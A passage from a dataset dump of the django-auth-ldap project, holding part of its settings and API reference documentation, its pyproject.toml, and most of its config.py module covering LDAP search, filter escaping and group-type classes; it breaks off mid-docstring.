callable, it is now passed a\n    positional ``request`` argument. Support for no arguments will continue for\n    backwards compatibility but will be removed in a future version.\n\n\n.. setting:: AUTH_LDAP_START_TLS\n\nAUTH_LDAP_START_TLS\n~~~~~~~~~~~~~~~~~~~\n\nDefault: ``False``\n\nIf ``True``, each connection to the LDAP server will call\n:meth:`~ldap.LDAPObject.start_tls_s` to enable TLS encryption over the standard\nLDAP port. There are a number of configuration options that can be given to\n:setting:`AUTH_LDAP_GLOBAL_OPTIONS` that affect the TLS connection. For example,\n:data:`ldap.OPT_X_TLS_REQUIRE_CERT` can be set to :data:`ldap.OPT_X_TLS_NEVER`\nto disable certificate verification, perhaps to allow self-signed certificates.\n\n\n.. setting:: AUTH_LDAP_USER_QUERY_FIELD\n\nAUTH_LDAP_USER_QUERY_FIELD\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``None``\n\nThe field on the user model used to query the authenticating user in the\ndatabase. If unset, uses the value of ``USERNAME_FIELD`` of the model class.\nWhen set, the value used to query is obtained through the\n:setting:`AUTH_LDAP_USER_ATTR_MAP`. For example, setting :setting:`AUTH_LDAP_USER_QUERY_FIELD`\nto ``username`` and adding ``\"username\": \"sAMAccountName\",`` to :setting:`AUTH_LDAP_USER_ATTR_MAP`\nwill cause Django to query the local database using the ``username`` column and\nLDAP using the ``sAMAccountName`` attribute.\n\n\n.. setting:: AUTH_LDAP_USER_ATTRLIST\n\nAUTH_LDAP_USER_ATTRLIST\n~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``None``\n\nA list of attribute names to load for the authenticated user. Normally, you can\nignore this and the LDAP server will send back all of the attributes of the\ndirectory entry. One reason you might need to override this is to get\noperational attributes, which are not normally included:\n\n.. code-block:: python\n\n    AUTH_LDAP_USER_ATTRLIST = [\"*\", \"+\"]\n\n\n.. setting:: AUTH_LDAP_USER_ATTR_MAP\n\nAUTH_LDAP_USER_ATTR_MAP\n~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``{}``\n\nA mapping from :class:`~django.contrib.auth.models.User` field names to LDAP\nattribute names. A user's :class:`~django.contrib.auth.models.User` object will\nbe populated from their LDAP attributes at login.\n\n\n.. setting:: AUTH_LDAP_USER_DN_TEMPLATE\n\nAUTH_LDAP_USER_DN_TEMPLATE\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``None``\n\nA string template that describes any user's distinguished name based on the\nusername. This must contain the placeholder ``%(user)s``.\n\n\n.. 
setting:: AUTH_LDAP_USER_FLAGS_BY_GROUP\n\nAUTH_LDAP_USER_FLAGS_BY_GROUP\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``{}``\n\nA mapping from boolean :class:`~django.contrib.auth.models.User` field names to\ndistinguished names of LDAP groups. The corresponding field is set to ``True``\nor ``False`` according to whether the user is a member of the group.\n\nValues may be strings for simple group membership tests or\n:class:`~django_auth_ldap.config.LDAPGroupQuery` instances for more complex\ncases.\n\n\n.. setting:: AUTH_LDAP_USER_SEARCH\n\nAUTH_LDAP_USER_SEARCH\n~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``None``\n\nAn :class:`~django_auth_ldap.config.LDAPSearch` object that will locate a user\nin the directory. The filter parameter should contain the placeholder\n``%(user)s`` for the username. It must return exactly one result for\nauthentication to succeed.\n\n\nModule Properties\n-----------------\n\n.. module:: django_auth_ldap\n\n.. data:: version\n\n The library's current version number as a 3-tuple.\n\n.. data:: version_string\n\n The library's current version number as a string.\n\n\nConfiguration\n-------------\n\n.. module:: django_auth_ldap.config\n\n.. class:: LDAPSearch\n\n .. method:: __init__(base_dn, scope, filterstr='(objectClass=*)')\n\n :param str base_dn: The distinguished name of the search base.\n :param int scope: One of ``ldap.SCOPE_*``.\n :param str filterstr: An optional filter string (e.g.\n '(objectClass=person)'). In order to be valid, ``filterstr`` must be\n enclosed in parentheses.\n\n\n.. class:: LDAPSearchUnion\n\n .. versionadded:: 1.1\n\n .. method:: __init__(\\*searches)\n\n :param searches: Zero or more LDAPSearch objects. The result of the\n overall search is the union (by DN) of the results of the underlying\n searches. The precedence of the underlying results and the ordering\n of the final results are both undefined.\n :type searches: :class:`LDAPSearch`\n\n\n.. class:: LDAPGroupType\n\n The base class for objects that will determine group membership for various\n LDAP grouping mechanisms. Implementations are provided for common group\n types or you can write your own. See the source code for subclassing notes.\n\n .. method:: __init__(name_attr='cn')\n\n By default, LDAP groups will be mapped to Django groups by taking the\n first value of the cn attribute. You can specify a different attribute\n with ``name_attr``.\n\n\n.. class:: PosixGroupType\n\n A concrete subclass of :class:`~django_auth_ldap.config.LDAPGroupType` that\n handles the ``posixGroup`` object class. This checks for both primary group\n and group membership.\n\n .. method:: __init__(name_attr='cn')\n\n\n.. class:: MemberDNGroupType\n\n A concrete subclass of\n :class:`~django_auth_ldap.config.LDAPGroupType` that handles grouping\n mechanisms wherein the group object contains a list of its member DNs.\n\n .. method:: __init__(member_attr, name_attr='cn')\n\n :param str member_attr: The attribute on the group object that contains\n a list of member DNs. 'member' and 'uniqueMember' are common\n examples.\n\n\n.. class:: NestedMemberDNGroupType\n\n Similar to :class:`~django_auth_ldap.config.MemberDNGroupType`, except this\n allows groups to contain other groups as members. Group hierarchies will be\n traversed to determine membership.\n\n .. method:: __init__(member_attr, name_attr='cn')\n\n As above.\n\n\n.. class:: GroupOfNamesType\n\n A concrete subclass of :class:`~django_auth_ldap.config.MemberDNGroupType`\n that handles the ``groupOfNames`` object class. 
Equivalent to\n ``MemberDNGroupType('member')``.\n\n .. method:: __init__(name_attr='cn')\n\n\n.. class:: NestedGroupOfNamesType\n\n A concrete subclass of\n :class:`~django_auth_ldap.config.NestedMemberDNGroupType` that handles the\n ``groupOfNames`` object class. Equivalent to\n ``NestedMemberDNGroupType('member')``.\n\n .. method:: __init__(name_attr='cn')\n\n\n.. class:: GroupOfUniqueNamesType\n\n A concrete subclass of :class:`~django_auth_ldap.config.MemberDNGroupType`\n that handles the ``groupOfUniqueNames`` object class. Equivalent to\n ``MemberDNGroupType('uniqueMember')``.\n\n .. method:: __init__(name_attr='cn')\n\n\n.. class:: NestedGroupOfUniqueNamesType\n\n A concrete subclass of\n :class:`~django_auth_ldap.config.NestedMemberDNGroupType` that handles the\n ``groupOfUniqueNames`` object class. Equivalent to\n ``NestedMemberDNGroupType('uniqueMember')``.\n\n .. method:: __init__(name_attr='cn')\n\n\n.. class:: ActiveDirectoryGroupType\n\n A concrete subclass of :class:`~django_auth_ldap.config.MemberDNGroupType`\n that handles Active Directory groups. Equivalent to\n ``MemberDNGroupType('member')``.\n\n .. method:: __init__(name_attr='cn')\n\n\n.. class:: NestedActiveDirectoryGroupType\n\n A concrete subclass of\n :class:`~django_auth_ldap.config.NestedMemberDNGroupType` that handles\n Active Directory groups. Equivalent to\n ``NestedMemberDNGroupType('member')``.\n\n .. method:: __init__(name_attr='cn')\n\n\n.. class:: OrganizationalRoleGroupType\n\n A concrete subclass of :class:`~django_auth_ldap.config.MemberDNGroupType`\n that handles the ``organizationalRole`` object class. Equivalent to\n ``MemberDNGroupType('roleOccupant')``.\n\n .. method:: __init__(name_attr='cn')\n\n\n.. class:: NestedOrganizationalRoleGroupType\n\n A concrete subclass of\n :class:`~django_auth_ldap.config.NestedMemberDNGroupType` that handles the\n ``organizationalRole`` object class. Equivalent to\n ``NestedMemberDNGroupType('roleOccupant')``.\n\n .. method:: __init__(name_attr='cn')\n\n\n.. class:: LDAPGroupQuery\n\n Represents a compound query for group membership.\n\n This can be used to construct an arbitrarily complex group membership query\n with AND, OR, and NOT logical operators. Construct primitive queries with a\n group DN as the only argument. These queries can then be combined with the\n ``&``, ``|``, and ``~`` operators.\n\n This is used by certain settings, including\n :setting:`AUTH_LDAP_REQUIRE_GROUP` and\n :setting:`AUTH_LDAP_USER_FLAGS_BY_GROUP`. An example is shown in\n :ref:`limiting-access`.\n\n .. method:: __init__(group_dn)\n\n :param str group_dn: The distinguished name of a group to test for\n membership.\n\n\nBackend\n-------\n\n.. module:: django_auth_ldap.backend\n\n.. data:: populate_user\n\n This is a Django signal that is sent when clients should perform additional\n customization of a :class:`~django.contrib.auth.models.User` object. It is\n sent after a user has been authenticated and the backend has finished\n populating it, and just before it is saved. The client may take this\n opportunity to populate additional model fields, perhaps based on\n ``ldap_user.attrs``. This signal has two keyword arguments: ``user`` is the\n :class:`~django.contrib.auth.models.User` object and ``ldap_user`` is the\n same as ``user.ldap_user``. The sender is the\n :class:`~django_auth_ldap.backend.LDAPBackend` class.\n\n.. data:: ldap_error\n\n\n This is a Django signal that is sent when we receive an\n :exc:`ldap.LDAPError` exception. 
The signal has four keyword arguments:\n\n - ``context``: one of ``'authenticate'``, ``'get_group_permissions'``, or\n ``'populate_user'``, indicating which API was being called when the\n exception was caught.\n - ``user``: the Django user being processed (if available).\n - ``request``: the Django request object associated with the\n authentication attempt (if available).\n - ``exception``: the :exc:`~ldap.LDAPError` object itself.\n\n The sender is the :class:`~django_auth_ldap.backend.LDAPBackend` class (or\n subclass).\n\n.. class:: LDAPBackend\n\n :class:`~django_auth_ldap.backend.LDAPBackend` has one method that may be\n called directly and several that may be overridden in subclasses.\n\n .. data:: settings_prefix\n\n A prefix for all of our Django settings. By default, this is\n ``'AUTH_LDAP_'``, but subclasses can override this. When different\n subclasses use different prefixes, they can both be installed and\n operate independently.\n\n .. data:: default_settings\n\n A dictionary of default settings. This is empty in\n :class:`~django_auth_ldap.backend.LDAPBackend`, but subclasses can\n populate this with values that will override the built-in defaults. Note\n that the keys should omit the ``'AUTH_LDAP_'`` prefix.\n\n .. method:: populate_user(username)\n\n Populates the Django user for the given LDAP username. This connects to\n the LDAP directory with the default credentials and attempts to populate\n the indicated Django user as if they had just logged in.\n :setting:`AUTH_LDAP_ALWAYS_UPDATE_USER` is ignored (assumed ``True``).\n\n .. method:: get_user_model(self)\n\n Returns the user model that\n :meth:`~django_auth_ldap.backend.LDAPBackend.get_or_build_user` will\n instantiate. By default, custom user models will be respected.\n Subclasses would most likely override this in order to substitute a\n :ref:`proxy model <proxy-models>`.\n\n .. method:: authenticate_ldap_user(self, ldap_user, password)\n\n Given an LDAP user object and password, authenticates the user and\n returns a Django user object. See :ref:`customizing-authentication`.\n\n .. method:: get_or_build_user(self, username, ldap_user)\n\n Given a username and an LDAP user object, this must return a valid\n Django user model instance. The ``username`` argument has already been\n passed through\n :meth:`~django_auth_ldap.backend.LDAPBackend.ldap_to_django_username`.\n You can get information about the LDAP user via ``ldap_user.dn`` and\n ``ldap_user.attrs``. The return value must be an (instance, created)\n two-tuple. The instance does not need to be saved.\n\n The default implementation looks for the username with a\n case-insensitive query; if it's not found, the model returned by\n :meth:`~django_auth_ldap.backend.LDAPBackend.get_user_model` will be\n created with the lowercased username. New users will not be saved to the\n database until after the :data:`django_auth_ldap.backend.populate_user`\n signal has been sent.\n\n A subclass may override this to associate LDAP users to Django users any\n way it likes.\n\n .. method:: ldap_to_django_username(username)\n\n Returns a valid Django username based on the given LDAP username (which\n is what the user enters). By default, ``username`` is returned\n unchanged. This can be overridden by subclasses.\n\n .. 
method:: django_to_ldap_username(username)\n\n The inverse of\n :meth:`~django_auth_ldap.backend.LDAPBackend.ldap_to_django_username`.\n If this is not symmetrical to\n :meth:`~django_auth_ldap.backend.LDAPBackend.ldap_to_django_username`,\n the behavior is undefined.\n" }, { "alpha_fraction": 0.6319867372512817, "alphanum_fraction": 0.6480354070663452, "avg_line_length": 29.627119064331055, "blob_id": "984a8a93f498ed8cbdd2eeae33b13994383dd815", "content_id": "4b8057d5432eb9e775b2861efcba7a7eff230444", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 1807, "license_type": "permissive", "max_line_length": 84, "num_lines": 59, "path": "/pyproject.toml", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "[project]\nname = \"django-auth-ldap\"\nrequires-python = \">=3.8\"\ndescription = \"Django LDAP authentication backend\"\nreadme = \"README.rst\"\nauthors = [\n { name=\"Peter Sagerson\", email=\"[email protected]\"},\n]\nmaintainers = [\n { name=\"François Freitag\", email=\"[email protected]\" },\n]\nlicense = { text=\"BSD\" }\nclassifiers = [\n \"Development Status :: 5 - Production/Stable\",\n \"Environment :: Web Environment\",\n \"Framework :: Django\",\n \"Framework :: Django :: 3.2\",\n \"Framework :: Django :: 4.1\",\n \"Framework :: Django :: 4.2\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: System Administrators\",\n \"License :: OSI Approved :: BSD License\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3 :: Only\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: 3.10\",\n \"Programming Language :: Python :: 3.11\",\n \"Topic :: Internet :: WWW/HTTP\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"Topic :: System :: Systems Administration :: Authentication/Directory :: LDAP\",\n]\ndynamic = [\"version\"]\n\ndependencies = [\n \"Django>=3.2\",\n \"python-ldap>=3.1\",\n]\n\n[project.urls]\nHomepage = \"https://github.com/django-auth-ldap/django-auth-ldap\"\nDocumentation = \"https://django-auth-ldap.readthedocs.io/\"\nSource = \"https://github.com/django-auth-ldap/django-auth-ldap\"\nTracker = \"https://github.com/django-auth-ldap/django-auth-ldap/issues\"\nChangelog = \"https://github.com/django-auth-ldap/django-auth-ldap/releases/\"\n\n[tool.isort]\nprofile = \"black\"\n\n[build-system]\nrequires = [\n \"setuptools>=42\",\n \"setuptools_scm[toml]>=3.4\",\n]\nbuild-backend = \"setuptools.build_meta\"\n\n[tool.setuptools_scm]\nwrite_to = \"django_auth_ldap/version.py\"\n" }, { "alpha_fraction": 0.6082210540771484, "alphanum_fraction": 0.6091006994247437, "avg_line_length": 31.521455764770508, "blob_id": "143a393eb1187fbc224bd775a4ac5a3c6997b505", "content_id": "6dcdefa8fa0028ac205116d052646e123481bb2a", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 25009, "license_type": "permissive", "max_line_length": 88, "num_lines": 769, "path": "/django_auth_ldap/config.py", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "# Copyright (c) 2009, Peter Sagerson\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# - Redistributions of source code must retain the 
above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# - Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n\"\"\"\nThis module contains classes that will be needed for configuration of LDAP\nauthentication. Unlike backend.py, this is safe to import into settings.py.\nPlease see the docstring on the backend module for more information, including\nnotes on naming conventions.\n\"\"\"\n\nimport logging\nimport pprint\n\nimport ldap\nimport ldap.filter\nfrom django.conf import settings\nfrom django.utils.tree import Node\n\n\nclass ConfigurationWarning(UserWarning):\n pass\n\n\nclass LDAPSettings:\n \"\"\"\n This is a simple class to take the place of the global settings object. An\n instance will contain all of our settings as attributes, with default values\n if they are not specified by the configuration.\n \"\"\"\n\n _prefix = \"AUTH_LDAP_\"\n\n defaults = {\n \"ALWAYS_UPDATE_USER\": True,\n \"AUTHORIZE_ALL_USERS\": False,\n \"BIND_AS_AUTHENTICATING_USER\": False,\n \"REFRESH_DN_ON_BIND\": False,\n \"BIND_DN\": \"\",\n \"BIND_PASSWORD\": \"\",\n \"CONNECTION_OPTIONS\": {},\n \"DENY_GROUP\": None,\n \"FIND_GROUP_PERMS\": False,\n \"CACHE_TIMEOUT\": 0,\n \"GROUP_SEARCH\": None,\n \"GROUP_TYPE\": None,\n \"MIRROR_GROUPS\": None,\n \"MIRROR_GROUPS_EXCEPT\": None,\n \"PERMIT_EMPTY_PASSWORD\": False,\n \"REQUIRE_GROUP\": None,\n \"NO_NEW_USERS\": False,\n \"SERVER_URI\": \"ldap://localhost\",\n \"START_TLS\": False,\n \"USER_QUERY_FIELD\": None,\n \"USER_ATTRLIST\": None,\n \"USER_ATTR_MAP\": {},\n \"USER_DN_TEMPLATE\": None,\n \"USER_FLAGS_BY_GROUP\": {},\n \"USER_SEARCH\": None,\n }\n\n def __init__(self, prefix=\"AUTH_LDAP_\", defaults={}):\n \"\"\"\n Loads our settings from django.conf.settings, applying defaults for any\n that are omitted.\n \"\"\"\n self._prefix = prefix\n\n defaults = dict(self.defaults, **defaults)\n\n for name, default in defaults.items():\n value = getattr(settings, prefix + name, default)\n setattr(self, name, value)\n\n def _name(self, suffix):\n return self._prefix + suffix\n\n\nclass _LDAPConfig:\n \"\"\"\n A private class that loads and caches some global objects.\n \"\"\"\n\n logger = None\n\n _ldap_configured = False\n\n @classmethod\n def get_ldap(cls, global_options=None):\n \"\"\"\n Returns the configured ldap module.\n \"\"\"\n # Apply global LDAP options once\n if not cls._ldap_configured and global_options is not None:\n for opt, value in global_options.items():\n ldap.set_option(opt, value)\n\n cls._ldap_configured = True\n\n return ldap\n\n @classmethod\n def get_logger(cls):\n \"\"\"\n 
Initializes and returns our logger instance.\n \"\"\"\n if cls.logger is None:\n cls.logger = logging.getLogger(\"django_auth_ldap\")\n cls.logger.addHandler(logging.NullHandler())\n\n return cls.logger\n\n\n# Our global logger\nlogger = _LDAPConfig.get_logger()\n\n\nclass LDAPSearch:\n \"\"\"\n Public class that holds a set of LDAP search parameters. Objects of this\n class should be considered immutable. Only the initialization method is\n documented for configuration purposes. Internal clients may use the other\n methods to refine and execute the search.\n \"\"\"\n\n def __init__(self, base_dn, scope, filterstr=\"(objectClass=*)\", attrlist=None):\n \"\"\"\n These parameters are the same as the first three parameters to\n ldap.search_s.\n \"\"\"\n self.base_dn = base_dn\n self.scope = scope\n self.filterstr = filterstr\n self.attrlist = attrlist\n self.ldap = _LDAPConfig.get_ldap()\n\n def __repr__(self):\n return \"<{}: {}>\".format(type(self).__name__, self.base_dn)\n\n def search_with_additional_terms(self, term_dict, escape=True):\n \"\"\"\n Returns a new search object with additional search terms and-ed to the\n filter string. term_dict maps attribute names to assertion values. If\n you don't want the values escaped, pass escape=False.\n \"\"\"\n term_strings = [self.filterstr]\n\n for name, value in term_dict.items():\n if escape:\n value = self.ldap.filter.escape_filter_chars(value)\n term_strings.append(\"({}={})\".format(name, value))\n\n filterstr = \"(&{})\".format(\"\".join(term_strings))\n\n return type(self)(self.base_dn, self.scope, filterstr, attrlist=self.attrlist)\n\n def search_with_additional_term_string(self, filterstr):\n \"\"\"\n Returns a new search object with filterstr and-ed to the original filter\n string. The caller is responsible for passing in a properly escaped\n string.\n \"\"\"\n filterstr = \"(&{}{})\".format(self.filterstr, filterstr)\n\n return type(self)(self.base_dn, self.scope, filterstr, attrlist=self.attrlist)\n\n def execute(self, connection, filterargs=(), escape=True):\n \"\"\"\n Executes the search on the given connection (an LDAPObject). filterargs\n is an object that will be used for expansion of the filter string.\n If escape is True, values in filterargs will be escaped.\n\n The python-ldap library returns utf8-encoded strings. For the sake of\n sanity, this method will decode all result strings and return them as\n Unicode.\n \"\"\"\n if escape:\n filterargs = self._escape_filterargs(filterargs)\n\n try:\n filterstr = self.filterstr % filterargs\n logger.debug(\n \"Invoking search_s('%s', %s, '%s')\", self.base_dn, self.scope, filterstr\n )\n results = connection.search_s(\n self.base_dn, self.scope, filterstr, self.attrlist\n )\n except ldap.LDAPError as e:\n results = []\n logger.error(\n \"search_s('%s', %s, '%s') raised %s\",\n self.base_dn,\n self.scope,\n filterstr,\n pprint.pformat(e),\n )\n\n return self._process_results(results)\n\n def _begin(self, connection, filterargs=(), escape=True):\n \"\"\"\n Begins an asynchronous search and returns the message id to retrieve\n the results.\n\n filterargs is an object that will be used for expansion of the filter\n string. 
If escape is True, values in filterargs will be escaped.\n\n \"\"\"\n if escape:\n filterargs = self._escape_filterargs(filterargs)\n\n try:\n filterstr = self.filterstr % filterargs\n msgid = connection.search(\n self.base_dn, self.scope, filterstr, self.attrlist\n )\n except ldap.LDAPError as e:\n msgid = None\n logger.error(\n \"search('%s', %s, '%s') raised %s\",\n self.base_dn,\n self.scope,\n filterstr,\n pprint.pformat(e),\n )\n\n return msgid\n\n def _results(self, connection, msgid):\n \"\"\"\n Returns the result of a previous asynchronous query.\n \"\"\"\n try:\n kind, results = connection.result(msgid)\n if kind not in (ldap.RES_SEARCH_ENTRY, ldap.RES_SEARCH_RESULT):\n results = []\n except ldap.LDAPError as e:\n results = []\n logger.error(\"result(%s) raised %s\", msgid, pprint.pformat(e))\n\n return self._process_results(results)\n\n def _escape_filterargs(self, filterargs):\n \"\"\"\n Escapes values in filterargs.\n\n filterargs is a value suitable for Django's string formatting operator\n (%), which means it's either a tuple or a dict. This return a new tuple\n or dict with all values escaped for use in filter strings.\n\n \"\"\"\n if isinstance(filterargs, tuple):\n filterargs = tuple(\n self.ldap.filter.escape_filter_chars(value) for value in filterargs\n )\n elif isinstance(filterargs, dict):\n filterargs = {\n key: self.ldap.filter.escape_filter_chars(value)\n for key, value in filterargs.items()\n }\n else:\n raise TypeError(\"filterargs must be a tuple or dict.\")\n\n return filterargs\n\n def _process_results(self, results):\n \"\"\"\n Returns a sanitized copy of raw LDAP results. This scrubs out\n references, decodes utf8, normalizes DNs, etc.\n \"\"\"\n results = [r for r in results if r[0] is not None]\n results = _DeepStringCoder(\"utf-8\").decode(results)\n\n # The normal form of a DN is lower case.\n results = [(r[0].lower(), r[1]) for r in results]\n\n result_dns = [result[0] for result in results]\n logger.debug(\n \"search_s('%s', %s, '%s') returned %d objects: %s\",\n self.base_dn,\n self.scope,\n self.filterstr,\n len(result_dns),\n \"; \".join(result_dns),\n )\n\n return results\n\n\nclass LDAPSearchUnion:\n \"\"\"\n A compound search object that returns the union of the results. Instantiate\n it with one or more LDAPSearch objects.\n \"\"\"\n\n def __init__(self, *args):\n self.searches = args\n self.ldap = _LDAPConfig.get_ldap()\n\n def search_with_additional_terms(self, term_dict, escape=True):\n searches = [\n s.search_with_additional_terms(term_dict, escape) for s in self.searches\n ]\n\n return type(self)(*searches)\n\n def search_with_additional_term_string(self, filterstr):\n searches = [\n s.search_with_additional_term_string(filterstr) for s in self.searches\n ]\n\n return type(self)(*searches)\n\n def execute(self, connection, filterargs=(), escape=True):\n msgids = [\n search._begin(connection, filterargs, escape) for search in self.searches\n ]\n results = {}\n\n for search, msgid in zip(self.searches, msgids):\n if msgid is not None:\n result = search._results(connection, msgid)\n results.update(dict(result))\n\n return results.items()\n\n\nclass _DeepStringCoder:\n \"\"\"\n Encodes and decodes strings in a nested structure of lists, tuples, and\n dicts. 
This is helpful when interacting with the Unicode-unaware\n python-ldap.\n \"\"\"\n\n def __init__(self, encoding):\n self.encoding = encoding\n self.ldap = _LDAPConfig.get_ldap()\n\n def decode(self, value):\n try:\n if isinstance(value, bytes):\n value = value.decode(self.encoding)\n elif isinstance(value, list):\n value = self._decode_list(value)\n elif isinstance(value, tuple):\n value = tuple(self._decode_list(value))\n elif isinstance(value, dict):\n value = self._decode_dict(value)\n except UnicodeDecodeError:\n pass\n\n return value\n\n def _decode_list(self, value):\n return [self.decode(v) for v in value]\n\n def _decode_dict(self, value):\n # Attribute dictionaries should be case-insensitive. python-ldap\n # defines this, although for some reason, it doesn't appear to use it\n # for search results.\n decoded = self.ldap.cidict.cidict()\n\n for k, v in value.items():\n decoded[self.decode(k)] = self.decode(v)\n\n return decoded\n\n\nclass LDAPGroupType:\n \"\"\"\n This is an abstract base class for classes that determine LDAP group\n membership. A group can mean many different things in LDAP, so we will need\n a concrete subclass for each grouping mechanism. Clients may subclass this\n if they have a group mechanism that is not handled by a built-in\n implementation.\n\n name_attr is the name of the LDAP attribute from which we will take the\n Django group name.\n\n Subclasses in this file must use self.ldap to access the python-ldap module.\n This will be a mock object during unit tests.\n \"\"\"\n\n def __init__(self, name_attr=\"cn\"):\n self.name_attr = name_attr\n self.ldap = _LDAPConfig.get_ldap()\n\n def user_groups(self, ldap_user, group_search):\n \"\"\"\n Returns a list of group_info structures, each one a group to which\n ldap_user belongs. group_search is an LDAPSearch object that returns all\n of the groups that the user might belong to. Typical implementations\n will apply additional filters to group_search and return the results of\n the search. ldap_user represents the user and has the following three\n properties:\n\n dn: the distinguished name\n attrs: a dictionary of LDAP attributes (with lists of values)\n connection: an LDAPObject that has been bound with credentials\n\n This is the primitive method in the API and must be implemented.\n \"\"\"\n return []\n\n def is_member(self, ldap_user, group_dn):\n \"\"\"\n This method is an optimization for determining group membership without\n loading all of the user's groups. Subclasses that are able to do this\n may return True or False. ldap_user is as above. group_dn is the\n distinguished name of the group in question.\n\n The base implementation returns None, which means we don't have enough\n information. The caller will have to call user_groups() instead and look\n for group_dn in the results.\n \"\"\"\n return None\n\n def group_name_from_info(self, group_info):\n \"\"\"\n Given the (DN, attrs) 2-tuple of an LDAP group, this returns the name of\n the Django group. 
This may return None to indicate that a particular\n LDAP group has no corresponding Django group.\n\n The base implementation returns the value of the cn attribute, or\n whichever attribute was given to __init__ in the name_attr\n parameter.\n \"\"\"\n try:\n name = group_info[1][self.name_attr][0]\n except (KeyError, IndexError):\n name = None\n\n return name\n\n\nALLOWED_LDAP_MEMBERSHIP_EXCEPTIONS = (\n ldap.UNDEFINED_TYPE, # Attribute does not exist in LDAP schema.\n ldap.NO_SUCH_ATTRIBUTE, # Attribute does not exist in the entry.\n ldap.NO_SUCH_OBJECT, # Group does not exist.\n)\n\n\nclass PosixGroupType(LDAPGroupType):\n \"\"\"\n An LDAPGroupType subclass that handles groups of class posixGroup.\n \"\"\"\n\n def user_groups(self, ldap_user, group_search):\n \"\"\"\n Searches for any group that is either the user's primary or contains the\n user as a member.\n \"\"\"\n groups = []\n\n try:\n user_uid = ldap_user.attrs[\"uid\"][0]\n\n if \"gidNumber\" in ldap_user.attrs:\n user_gid = ldap_user.attrs[\"gidNumber\"][0]\n filterstr = \"(|(gidNumber={})(memberUid={}))\".format(\n self.ldap.filter.escape_filter_chars(user_gid),\n self.ldap.filter.escape_filter_chars(user_uid),\n )\n else:\n filterstr = \"(memberUid={})\".format(\n self.ldap.filter.escape_filter_chars(user_uid)\n )\n\n search = group_search.search_with_additional_term_string(filterstr)\n groups = search.execute(ldap_user.connection)\n except (KeyError, IndexError):\n pass\n\n return groups\n\n def is_member(self, ldap_user, group_dn):\n \"\"\"\n Returns True if the group is the user's primary group or if the user is\n listed in the group's memberUid attribute.\n \"\"\"\n try:\n user_uid = ldap_user.attrs[\"uid\"][0]\n\n try:\n is_member = ldap_user.connection.compare_s(\n group_dn, \"memberUid\", user_uid.encode()\n )\n except ALLOWED_LDAP_MEMBERSHIP_EXCEPTIONS:\n is_member = False\n\n if not is_member:\n try:\n user_gid = ldap_user.attrs[\"gidNumber\"][0]\n is_member = ldap_user.connection.compare_s(\n group_dn, \"gidNumber\", user_gid.encode()\n )\n except ALLOWED_LDAP_MEMBERSHIP_EXCEPTIONS:\n is_member = False\n except (KeyError, IndexError):\n is_member = False\n\n return is_member\n\n\nclass MemberDNGroupType(LDAPGroupType):\n \"\"\"\n A group type that stores lists of members as distinguished names.\n \"\"\"\n\n def __init__(self, member_attr, name_attr=\"cn\"):\n \"\"\"\n member_attr is the attribute on the group object that holds the list of\n member DNs.\n \"\"\"\n self.member_attr = member_attr\n\n super().__init__(name_attr)\n\n def __repr__(self):\n return \"<{}: {}>\".format(type(self).__name__, self.member_attr)\n\n def user_groups(self, ldap_user, group_search):\n search = group_search.search_with_additional_terms(\n {self.member_attr: ldap_user.dn}\n )\n return search.execute(ldap_user.connection)\n\n def is_member(self, ldap_user, group_dn):\n try:\n result = ldap_user.connection.compare_s(\n group_dn, self.member_attr, ldap_user.dn.encode()\n )\n except ALLOWED_LDAP_MEMBERSHIP_EXCEPTIONS:\n result = 0\n\n return result\n\n\nclass NestedMemberDNGroupType(LDAPGroupType):\n \"\"\"\n A group type that stores lists of members as distinguished names and\n supports nested groups. 
